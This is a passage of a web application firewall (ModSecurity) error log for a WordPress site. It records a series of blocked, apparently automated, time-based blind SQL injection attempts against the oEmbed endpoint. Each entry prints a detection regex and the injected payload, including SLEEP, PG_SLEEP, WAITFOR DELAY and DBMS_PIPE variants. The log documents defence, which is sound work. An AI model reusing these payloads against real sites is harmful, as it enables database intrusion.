"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27EHxeJlWfH1pdny5XfQAAAMk"] [Thu Aug 15 03:23:44.772958 2024] [:error] [pid 31519:tid 139653797566208] [client 141.98.81.52:57130] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(74)||CHR(100)||CHR(81),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27EHxeJlWfH1pdny5XfgAAANg"] [Thu Aug 15 03:23:45.201761 2024] [:error] [pid 31337:tid 139653839529728] [client 141.98.81.52:57132] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(74)||CHR(100)||CHR(81),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27EewCyyCVFXh0DMS2ngAAAJM"] [Thu Aug 15 03:23:45.676179 2024] [:error] [pid 31337:tid 139654058071808] [client 141.98.81.52:57134] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml) AND SLEEP(5) AND (6315=6315"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27EewCyyCVFXh0DMS2nwAAAIE"] [Thu Aug 15 03:23:46.003856 2024] [:error] [pid 31519:tid 139653948634880] [client 141.98.81.52:57136] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml AND SLEEP(5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27EnxeJlWfH1pdny5XfwAAAMY"] [Thu Aug 15 03:23:46.424480 2024] [:error] [pid 31337:tid 139654066464512] [client 141.98.81.52:57138] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml') AND SLEEP(5) AND ('emJu'='emJu"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27EuwCyyCVFXh0DMS2oAAAAIA"] [Thu Aug 15 03:23:46.668196 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:57140] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml' AND SLEEP(5) AND 'ZdSV'='ZdSV"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27EnxeJlWfH1pdny5XgAAAAM0"] [Thu Aug 15 03:23:47.177508 2024] [:error] [pid 31519:tid 139654049679104] [client 141.98.81.52:57144] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml%' AND SLEEP(5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27E3xeJlWfH1pdny5XgQAAAMI"] [Thu Aug 15 03:23:47.651137 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:57146] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:format: xml AND SLEEP(5)-- SSwr"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27E3xeJlWfH1pdny5XggAAAME"] [Thu Aug 15 03:23:48.320935 2024] [:error] [pid 31335:tid 139653805958912] [client 141.98.81.52:57148] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml) AND 8725=(SELECT 8725 FROM PG_SLEEP(5)) AND (5859=5859"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27FG0MD5oChETZltkVZgAAABc"] [Thu Aug 15 03:23:48.582645 2024] [:error] [pid 31519:tid 139653906671360] [client 141.98.81.52:57150] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml AND 8725=(SELECT 8725 FROM PG_SLEEP(5))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27FHxeJlWfH1pdny5XgwAAAMs"] [Thu Aug 15 03:23:48.941364 2024] [:error] [pid 31519:tid 139654041286400] [client 141.98.81.52:57152] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml') AND 8725=(SELECT 8725 FROM PG_SLEEP(5)) AND ('FNbX'='FNbX"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27FHxeJlWfH1pdny5XhAAAAMM"] [Thu Aug 15 03:23:49.359632 2024] [:error] [pid 31337:tid 139653831137024] [client 141.98.81.52:57154] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml' AND 8725=(SELECT 8725 FROM PG_SLEEP(5)) AND 'dtOL'='dtOL"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27FewCyyCVFXh0DMS2oQAAAJQ"] [Thu Aug 15 03:23:49.726611 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:57156] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml%' AND 8725=(SELECT 8725 FROM PG_SLEEP(5)) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27FXxeJlWfH1pdny5XhQAAANc"] [Thu Aug 15 03:23:50.088421 2024] [:error] [pid 31337:tid 139654049679104] [client 141.98.81.52:57158] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:format: xml AND 8725=(SELECT 8725 FROM PG_SLEEP(5))-- TZYb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27FuwCyyCVFXh0DMS2ogAAAII"] [Thu Aug 15 03:23:50.500825 2024] [:error] [pid 31336:tid 139653814351616] [client 141.98.81.52:57160] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml) WAITFOR DELAY '0:0:5' AND (6559=6559"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27FkPAyXqJhbW53WyPYgAAAFY"] [Thu Aug 15 03:23:50.818400 2024] [:error] [pid 31335:tid 139653814351616] [client 141.98.81.52:57162] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml WAITFOR DELAY '0:0:5'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27Fm0MD5oChETZltkVZwAAABY"] [Thu Aug 15 03:23:51.133145 2024] [:error] [pid 31519:tid 139653915064064] [client 141.98.81.52:57164] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml') WAITFOR DELAY '0:0:5' AND ('YTbe'='YTbe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27F3xeJlWfH1pdny5XhgAAAMo"] [Thu Aug 15 03:23:51.546413 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:57166] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml' WAITFOR DELAY '0:0:5' AND 'nPZz'='nPZz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27F3xeJlWfH1pdny5XhwAAANI"] [Thu Aug 15 03:23:51.914417 2024] [:error] [pid 31519:tid 139653864707840] [client 141.98.81.52:57168] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml%' WAITFOR DELAY '0:0:5' AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27F3xeJlWfH1pdny5XiAAAANA"] [Thu Aug 15 03:23:52.323621 2024] [:error] [pid 31336:tid 139653831137024] [client 141.98.81.52:57170] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:format: xml WAITFOR DELAY '0:0:5'-- ibbJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27GEPAyXqJhbW53WyPYwAAAFQ"] [Thu Aug 15 03:23:52.754406 2024] [:error] [pid 31336:tid 139653822744320] [client 141.98.81.52:57172] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml) AND 7052=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(76)||CHR(110)||CHR(114),5) AND (3706=3706"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27GEPAyXqJhbW53WyPZAAAAFU"] [Thu Aug 15 03:23:53.132216 2024] [:error] [pid 31336:tid 139654024500992] [client 141.98.81.52:57174] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml AND 7052=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(76)||CHR(110)||CHR(114),5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag 